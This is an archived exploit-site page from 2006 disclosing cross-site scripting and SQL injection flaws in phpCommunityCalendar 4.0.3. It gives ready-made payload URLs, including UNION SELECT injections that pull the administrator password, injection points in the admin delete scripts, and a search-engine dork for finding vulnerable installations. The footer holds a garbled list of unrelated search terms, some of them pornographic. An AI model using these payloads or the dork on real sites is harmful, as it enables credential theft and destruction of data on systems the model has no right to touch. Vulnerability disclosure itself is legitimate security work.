about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpCommunityCalendar <= 4.0.3 Multiple (XSS/SQL) Vulnerabilites



2006-05-23 phpCommunityCalendar <= 4.0.3 Multiple (XSS/SQL) Vulnerabilites
Rated as : High Risk

##################################################################################
#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<#
##################################################################################
#										 #
#	 phpCommunityCalendar 4.0.3 Multiple Vulnerabilites		         #
#										 #
##################################################################################
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>#
##################################################################################
#										 #
#  author      : X0r_1   							 #
#  release     : 23.05.06							 #
#  software    : http://www.appideas.com/	  				 #
#  googledork  : "Calendar programming by AppIdeas.com"
filetype:php   		 #
#										 #
##################################################################################

XSS:

http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><"


SQL Injections:

http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT
Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT
Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]

http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]

http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]

http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]

http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]


securitydot.net - 2006-05-23

Advertising

Copyright 2007, SecurityDot
Thu, 03 Dec 2009 06:52:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
pournhup admin.php% news for c Www.Girlse www.pandam microsoft login.php vb 3.6.8 www.worlds NARUOXXX.h girls proboard 1 addguest.h login.php Tran pamella shell sp2 Sexey phot Phonertica Gambqp bok DCCP NEACED+LAD php-nuke 2 Powered By WWW.tensex julia t465t service pa ??? ??? ?? phpBB Grou Wap.bollyw MIAMINIGHT porno movi Www.Geonew NUDEIMAGE vb 3.6.8 i...to/idf Imagexxx sxx.video Hot girl p taotaobaob WBB Exploi www.bluefi mambo Remo www.asiaop java syste www.woasf. yourtub phpbb-2.0. SEXEMOVES